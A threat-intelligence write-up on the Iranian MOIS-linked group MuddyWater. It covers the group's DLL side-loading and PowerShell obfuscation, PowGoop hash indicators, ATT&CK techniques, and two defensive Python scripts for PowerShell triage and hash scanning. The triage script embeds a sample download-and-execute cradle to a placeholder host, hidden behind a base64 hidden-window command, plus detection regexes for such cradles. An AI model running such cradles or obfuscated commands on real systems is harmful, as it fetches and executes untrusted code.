USCYBERCOM has officially linked MuddyWater to Iran’s Ministry of Intelligence and Security (MOIS). The first MuddyWater campaign was observed in late 2017, when it targeted entities in the Middle East.
The experts named the campaign ‘MuddyWater’ because of the confusion in attributing a wave of attacks that, to date, has targeted entities in Saudi Arabia, Iraq, Israel, the United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States.
MOIS is the primary intelligence agency of the Islamic Republic of Iran and a member of the Iran Intelligence Community. The actors known in industry as MuddyWater are a subordinate element within MOIS and are part of the groups conducting Iranian intelligence activities.
MuddyWater has been seen using a variety of techniques to maintain access to victim networks. These include side-loading DLLs to trick legitimate programs into running malware, and obfuscating PowerShell scripts to hide command-and-control functions.
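Obfuscated PowerShell is only useful to an attacker while it stays unread, so one practical defensive step is to decode and score PowerShell command lines collected from process-creation telemetry. The following is an added example, not code from the original page or from any vendor mentioned in it; the sample command lines and the `example.test` URL are constructed placeholders, and the "two indicators" threshold is an assumption to be tuned against a real baseline.

```python
"""Triage of PowerShell command lines for obfuscation and hidden C2 indicators.

Added example (not code from the original page). Sample command lines are
constructed here; the 'example.test' URL is a placeholder.
"""
import base64
import re

# Regexes for traits that often accompany hidden command-and-control in PowerShell.
INDICATORS = {
    "encoded-command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no-profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "invoke-expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "download-cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I),
    "char-obfuscation": re.compile(r"\[char\]\s*\d+", re.I),
}

# PowerShell accepts any unique prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the clear-text script behind -EncodedCommand, or None if absent/invalid.

    PowerShell expects the argument to be base64 of the UTF-16LE encoded script.
    """
    match = ENCODED_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_command_line(cmdline):
    """Score one command line; indicators found in the decoded payload count too."""
    decoded = decode_encoded_command(cmdline)
    texts = [cmdline] + ([decoded] if decoded is not None else [])
    found = sorted(name for name, rx in INDICATORS.items()
                   if any(rx.search(t) for t in texts))
    # Two or more independent traits together is the threshold used here
    # (assumption for this example; tune against your own baseline).
    return {"decoded": decoded, "indicators": found, "suspicious": len(found) >= 2}


# Constructed sample data: a download cradle hidden behind -EncodedCommand,
# a [char]-built "iex" call, and a benign scheduled backup script.
CLEAR_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')"
ENCODED_PAYLOAD = base64.b64encode(CLEAR_PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_COMMAND_LINES = [
    f"powershell.exe -NoP -W Hidden -EncodedCommand {ENCODED_PAYLOAD}",
    'powershell.exe -nop -c "$f=[char]105+[char]101+[char]120; & $f $payload"',
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]


def triage_all(cmdlines=SAMPLE_COMMAND_LINES):
    """Triage a list of command lines; returns one result dict per line."""
    return [triage_command_line(c) for c in cmdlines]


if __name__ == "__main__":
    for line, result in zip(SAMPLE_COMMAND_LINES, triage_all()):
        status = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{status:10} {result['indicators']} {line[:60]}")
```

Decoding the `-EncodedCommand` argument before matching matters: the cradle in the first sample never appears in the raw command line, so a scanner that only greps the process arguments would miss it. Feeding real EDR or Sysmon Event ID 1 command lines into `triage_all` is the intended use.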
The researchers discovered an interesting subset of activity targeting the Exchange servers of high-profile organizations. This Exchange exploitation activity is notable because it is difficult to attribute to MuddyWater: it relies on publicly available offensive security tools. The attackers attempt to exploit Exchange servers using two different tools.
Indicators of Compromise
PowGoop variants
MD5: F8E7FF6895A18CC3D05D024AC7D8BE3E
SHA1: 97248B6E445D38D48334A30A916E7D9DDA33A9B2
SHA256: F1178846036F903C28B4AB752AFE1B38B531196677400C2250AC23377CF44EC3
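A hash list is only useful once it is run against hosts. The script below is an added example, not code from the original page or from any vendor it cites: it embeds the PowGoop hashes exactly as listed above, computes MD5, SHA1 and SHA256 in a single pass per file, and reports any match under a directory tree. The directory to scan is supplied by the caller; nothing on the page names one.

```python
"""Hash-matching the PowGoop indicators listed above against local files.

Added example (not code from the original page). The hashes are the page's
IoCs; the files scanned are whatever path the caller supplies.
"""
import hashlib
from pathlib import Path

# PowGoop variant hashes exactly as published above (MD5, SHA1, SHA256).
POWGOOP_IOCS = {
    "md5": ["F8E7FF6895A18CC3D05D024AC7D8BE3E"],
    "sha1": ["97248B6E445D38D48334A30A916E7D9DDA33A9B2"],
    "sha256": ["F1178846036F903C28B4AB752AFE1B38B531196677400C2250AC23377CF44EC3"],
}

# Normalise to lower-case sets once so lookups are case-insensitive and O(1).
IOC_SETS = {alg: {h.lower() for h in hashes} for alg, hashes in POWGOOP_IOCS.items()}


def hash_bytes(data):
    """MD5/SHA1/SHA256 of an in-memory blob (e.g. a sample pulled from a sandbox)."""
    return {alg: hashlib.new(alg, data).hexdigest() for alg in IOC_SETS}


def hash_file(path, chunk_size=1 << 20):
    """Compute all three digests in a single pass so large files are read once."""
    hashers = {alg: hashlib.new(alg) for alg in IOC_SETS}
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            for h in hashers.values():
                h.update(chunk)
    return {alg: h.hexdigest() for alg, h in hashers.items()}


def match_iocs(digests, iocs=IOC_SETS):
    """Return the algorithms under which `digests` hit a listed indicator."""
    return sorted(alg for alg, value in digests.items()
                  if value.lower() in iocs.get(alg, set()))


def scan_tree(root, iocs=IOC_SETS):
    """Walk a directory and report (path, matched algorithms) for every hit."""
    hits = []
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        try:
            matched = match_iocs(hash_file(path), iocs)
        except OSError:
            continue  # unreadable or vanished file; keep scanning
        if matched:
            hits.append((str(path), matched))
    return hits


if __name__ == "__main__":
    import sys
    for path, algs in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"MATCH {path}  ({', '.join(algs)})")
```

Hash matching is brittle against recompiled variants, so treat a hit as confirmation rather than as the only detection; the PowerShell and DLL side-loading behaviours described earlier on the page are the more durable signals.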
MITRE ATT&CK techniques
T1190 – Exploit Public-Facing Application
T1572 – Protocol Tunneling
T1574.001 – Hijack Execution Flow: DLL Search Order Hijacking
T1059.001 – Command and Scripting Interpreter: PowerShell
T1505.003 – Server Software Component: Web Shell
T1220 – XSL Script Processing